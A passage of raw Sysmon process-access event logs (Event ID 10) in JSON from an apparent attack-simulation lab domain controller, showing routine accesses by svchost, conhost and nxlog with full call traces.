06:50:00.034","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2797,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.034\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.034","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2798,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.034\r\nSourceProcessGUID: {E2A3D6B1-1098-5F25-0000-00103DE00400}\r\nSourceProcessId: 4140\r\nSourceThreadId: 4132\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1098-5F25-0000-0010F5E20400}\r\nTargetProcessId: 4164\r\nTargetImage: C:\\Windows\\system32\\reg.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.034","SourceProcessGUID":"{E2A3D6B1-1098-5F25-0000-00103DE00400}","SourceProcessId":"4140","SourceThreadId":"4132","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1098-5F25-0000-0010F5E20400}","TargetProcessId":"4164","TargetImage":"C:\\Windows\\system32\\reg.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2799,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:00.160\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:00.160","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2800,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:01.164\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:01.164","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2801,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:02.167\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:02.167","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2802,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:03.171\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:03.171","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2803,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:04.174\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:04.174","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files 